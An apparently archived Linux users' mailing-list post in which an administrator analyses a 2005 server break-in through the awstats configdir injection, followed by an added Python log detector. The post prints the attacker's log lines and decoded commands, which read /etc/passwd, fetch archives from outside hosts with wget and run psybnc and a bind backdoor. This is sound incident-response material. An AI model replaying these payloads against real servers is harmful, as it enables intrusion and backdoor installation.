lug-bg: Re: lug-bg: something interesting
- Subject: lug-bg: Re: lug-bg: something interesting
- From: "D. Dilev" <unionddd@xxxxxx>
- Date: Fri, 25 Feb 2005 00:01:04 +0200 (EET)
Thanks to everyone for the replies. They were useful to me.
The machine was compromised through awstats.
The compilation of psybnc did not succeed, but the tw port backdoor met no obstacles.
I'm pasting the investigation I did:
this is from the apache log file:
82.96.126.130 - - [22/Feb/2005:22:06:11 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2fgeocities%2ecom%2fsickady%2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3bmake%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 14978 "-" "-"
82.96.126.130 - - [22/Feb/2005:22:09:18 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fgeocities%2ecom%2fsickady%2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 13307 "-" "-"
82.96.126.130 - - [22/Feb/2005:22:09:54 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20tw%3b%2e%2fbind%3becho%20Instalam%20bind%20in%20%2ftmp%3bcd%20%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20rw%3b%2e%2fbind%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20by%20Zorg%20of%20texter%21%3becho%20e_exp%3b%2500 HTTP/1.1" 200 2686 "-" "-"
in simpler words, what gets executed above is this:
1. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;make;./psybnc;echo e_exp;%00
2. |echo ;echo b_exp;cd /tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;./psybnc;echo e_exp;%00
3. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd tw;./bind;echo Instalam bind in /tmp;cd /tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd rw;./bind;echo -------------------------;echo by Zorg of texter!;echo e_exp;%00
in other words:
1. |echo ;
echo b_exp;
cat /etc/passwd;
uname -a;
id;
echo Instalam Bind in /var/tmp;
cd /var/tmp;
wget http://geocities.com/sickady/p.tgz;
tar xvfz p.tgz;
cd psybnc;
make;
./psybnc;
echo e_exp;
%00
2. |echo ;
echo b_exp;
cd /tmp;
wget http://geocities.com/sickady/p.tgz;
tar xvfz p.tgz;
cd psybnc;
./psybnc;
echo e_exp;
%00
3. |echo ;
echo b_exp;
cat /etc/passwd;
uname -a;
id;
echo Instalam Bind in /var/tmp;
cd /var/tmp;
wget www.petry.se/public_html/tw.tar.gz;
tar -xvzf tw.tar.gz;
cd tw;
./bind;
echo Instalam bind in /tmp;
cd /tmp;
wget www.petry.se/public_html/tw.tar.gz;
tar -xvzf tw.tar.gz;
cd rw;
./bind;
echo -------------------------;
echo by Zorg of texter!;
echo e_exp;%00
after that I found them here:
/var/tmp# ls -alu
-rw-r--r-- 1 nobody nobody 605272 Feb 22 22:06 p.tgz
drwxr-xr-x 11 nobody nobody 4096 Feb 22 22:06 psybnc
drwxr-xr-x 2 nobody nobody 4096 Feb 22 22:04 tw
-rw-r--r-- 1 nobody nobody 16414 Feb 22 22:04 tw.tar.gz
-rwxr-xr-x 1 nobody nobody 16414 Feb 22 22:06 x0b
/tmp# ls -alu
-rw-r--r-- 1 nobody nobody 605272 Feb 22 22:06 p.tgz
drwxr-xr-x 11 nobody nobody 4096 Feb 22 22:09 psybnc
drwxr-xr-x 2 nobody nobody 4096 Feb 22 22:06 tw
-rw-r--r-- 1 nobody nobody 16414 Feb 22 22:07 tw.tar.gz
-rwxr-xr-x 1 nobody nobody 16414 Feb 22 22:07 x0b
Regards
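As an added example (not part of the original post or of awstats), a small Python detector that walks Apache access-log lines, decodes the configdir parameter of awstats.pl requests and flags the pipe-injection pattern shown above, splitting the decoded payload into the individual commands and the fetched files an incident responder would then look for on disk. The log lines, IP addresses, URLs and the log regex are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache combined log format, only the fields we need (constructed regex)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample: one injection attempt, one legitimate awstats call, one unrelated hit
SAMPLE_LOG = """\
203.0.113.7 - - [22/Feb/2005:22:06:11 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3bwget%20http%3a%2f%2fexample.invalid%2fp%2etgz%3b%2500 HTTP/1.1" 200 14978 "-" "-"
203.0.113.7 - - [22/Feb/2005:22:07:02 +0200] "GET /cgi-bin/awstats.pl?configdir=%2fetc%2fawstats&config=www.example.org HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.4 - - [22/Feb/2005:22:08:40 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

def configdir_param(url):
    """Return the decoded configdir value of an awstats.pl request, or None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/awstats.pl"):
        return None
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if key == "configdir":
            return unquote(value)  # decode once, so %2500 shows up as %00
    return None

def injected_commands(configdir):
    """Split a '|'-prefixed configdir into the shell commands it carries."""
    if not configdir.startswith("|"):
        return []
    cmds = [c.strip() for c in configdir[1:].split(";")]
    return [c for c in cmds if c and c != "%00"]  # trailing %00 is a terminator, not a command

def analyze_log(lines):
    """One finding per request whose configdir begins with a pipe, i.e. the pattern above."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        cfg = configdir_param(m.group("url")) if m else None
        cmds = injected_commands(cfg) if cfg else []
        if not cmds:
            continue
        findings.append({
            "ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
            "commands": cmds,
            # what the payload tried to fetch: the file names to look for on disk afterwards
            "downloads": [c[5:].strip() for c in cmds if c.startswith("wget ")],
        })
    return findings
```

A 200 status on a flagged line means the CGI ran the request, so the listed downloads are the first places to check in /tmp and /var/tmp, as the post above does.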
============================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers).
http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora
To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
============================================================================